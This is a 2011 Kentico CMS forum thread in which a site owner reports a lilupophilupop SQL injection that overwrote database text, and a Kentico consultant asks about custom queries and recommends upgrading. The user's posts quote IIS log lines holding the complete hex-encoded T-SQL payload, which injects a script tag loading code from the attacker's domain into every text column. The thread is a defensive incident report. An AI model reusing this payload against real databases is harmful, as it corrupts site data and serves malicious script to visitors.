Old Forums
Search:
Portal Engine Questions on portal engine and web parts.
Version 6.x > Portal Engine > SQL Injection (lilupophilupop) View modes: 
User avatar
Member
Member
fzk-hotmail.com - 12/8/2011 3:58:17 AM
   
SQL Injection (lilupophilupop)
We lost control of our Kentico CMS site, all data was deleted (updated) because of that attack:

http://isc.sans.edu/diary.html?storyid=12127

Strings in tables were updated with that line:

></title><script src="hXXp://lilupophilupop.com/sl.php"></script>

At least 200.000 site effected in a few days. Probably most of your sites will be attacked too.

I wonder about does kentico know about that attack and has any update?

User avatar
Kentico Consulting
Kentico Consulting
kentico_borisp - 12/8/2011 4:09:08 AM
   
RE:SQL Injection (lilupophilupop)
Hello,

Yes, we already received a message regarding this issue.
Do you use any query parameters in the Where conditions/Order by expressions of any viewers?
Do you use any custom queries/web parts where the visitor can affect the query which is ran on the database?
The standard web parts/Kentico components are protected against the SQL injections but there can be for example a custom unsecured Where condition.
We improve the security in every version so the upgrade to the current version with the latest hotfix or upgrading to version 6.0 is highly recommended.

Best regards,
Boris Pocatko

User avatar
Member
Member
fzk-hotmail.com - 12/8/2011 4:50:34 AM
   
RE:SQL Injection (lilupophilupop)
IIS log is like that, i am not sure what was there in these pages:

2011-12-06 21:12:09 W3SVC1374239889 195.49.216.36 GET /XXXXXX/GetFile.aspx nodeid=25968%29+
declare+%40s+varchar%284000%29+set+%40s%3Dcast%280x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c4
15245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7
320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c277465787427292061
6e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e333020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c45272
04f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e204558454
32827555044415445205b272b40542b275d20534554205b272b40432b275d3d2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f6c696c75706f7068696c75706f702e636f6d2f736c2e706870223e3c2f
7363726970743e3c212d2d27272b525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d2929207768657265204c45465428525452494d28434f4e5645525428564152434841522836303030292c5b
272b40432b275d29292c3137293c3e2727223e3c2f7469746c653e3c7363726970742727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626
c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar%284000%29%29
+exec%28%40s%29-- 80 - 173.212.213.36 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0) 500 0 0


OR

2011-12-06 21:08:50 W3SVC1374239889 195.49.216.36 GET /XXXXXX/XXXXXX/popup.aspx
type=single&aliaspath=%2FXXXXXX+UniverSiteSi%2FEnglish%2FEducation%2FGraduate%2FSocial+Sciences+Graduate+Studi%2FLaw%2FNews%2FLatest+News%27
+declare+%40s+varchar%284000%29+set+%40s%3Dcast%280x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c
415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6
e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c27746578742729
20616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e333020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424
c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20
455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f6c696c75706f7068696c75706f702e636f6d2f736c2e7068
70223e3c2f7363726970743e3c212d2d27272b525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d2929207768657265204c45465428525452494d28434f4e56455254285641524348415228
36303030292c5b272b40432b275d29292c3137293c3e2727223e3c2f7469746c653e3c7363726970742727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420
434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar%284000%29%29+exec%28%40s%29
-- 80 - 173.212.213.36 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0) 500 0 0
User avatar
Kentico Consulting
Kentico Consulting
kentico_borisp - 12/9/2011 8:10:59 AM
   
RE:SQL Injection (lilupophilupop)
Hello,

Could you please send us a message to support@kentico.com? We will need additional details to debug this issue.
Additionally, which version of Kentico are you using? Older versions had a vulnerability, but this was fixed in the 6.0 version.

Best regards,
Boris Pocatko

Top